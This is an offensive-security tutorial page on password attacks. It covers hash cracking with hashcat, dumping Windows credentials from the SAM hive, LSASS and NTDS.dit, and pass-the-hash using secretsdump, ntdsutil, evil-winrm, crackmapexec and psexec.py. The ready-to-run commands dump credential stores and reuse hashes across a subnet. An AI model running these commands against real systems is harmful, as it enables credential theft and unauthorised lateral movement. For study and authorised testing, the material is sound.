arrow_back Back to Learn
Access Techniques

Password Attacks
Crack, Dump, Relay

person 0x74shelby category Access Techniques · Intermediate
screenshot_monitor

01

Hash Cracking

Hash cracking doesn't reverse a hash function — it finds an input that produces the same hash. You take a wordlist, hash every entry with the same algorithm and salt (if applicable), and compare against your target hash. Offline cracking is fast because there are no lockouts and you can throw GPU power at it.

Identify the hash type first. MD5 hashes are 32 hex characters. NTLM is also 32 characters but has a different format in credential dumps. SHA-256 is 64 characters. Bcrypt starts with $2a$ or $2b$ and is deliberately expensive. The hash type determines the cracking mode and expected speed.

hashcat examples
hashcat -m 0   hash.txt rockyou.txt            # MD5
hashcat -m 1000 hash.txt rockyou.txt           # NTLM
hashcat -m 1800 hash.txt rockyou.txt           # sha512crypt (Linux shadow)
hashcat -m 13100 hash.txt rockyou.txt          # Kerberoast TGS
hashcat -m 1000 hash.txt rockyou.txt -r rules/best64.rule

Rules Multiply Coverage

Rules transform wordlist entries on the fly. best64.rule tries capitalisation, number suffixes, and common substitutions. A 14 million word wordlist with 64 rules becomes 896 million candidates. Most real passwords are dictionary words with predictable mutations.

02

Windows Credential Dumping

Windows stores credentials in several places. The SAM database holds local account NTLM hashes. LSASS (Local Security Authority Subsystem Service) keeps cached credentials, NTLM hashes, and sometimes plaintext passwords in memory. NTDS.dit is the Active Directory database on domain controllers and contains hashes for every domain account.

credential dumping
reg save HKLM\SAM sam.hiv
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SECURITY security.hiv

secretsdump.py -sam sam.hiv -system system.hiv LOCAL

secretsdump.py domain.local/administrator:[REDACTED]@DC_IP
ntdsutil "ac i ntds" "ifm" "create full c:\ntds" q q
03

Pass-the-Hash

NTLM authentication doesn't require you to know the actual password — it requires you to know the hash. If you've dumped an NTLM hash from one machine, you can use it directly to authenticate to other machines on the network without ever cracking it. This is Pass-the-Hash.

pass-the-hash
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH

crackmapexec smb SUBNET/24 -u administrator -H NTLM_HASH

psexec.py -hashes :NTLM_HASH administrator@TARGET_IP

Pass-the-Hash is why password complexity requirements alone don't prevent lateral movement. Once you have one hash, you potentially have keys to everything that account can reach — across the entire network, without ever seeing the plaintext password.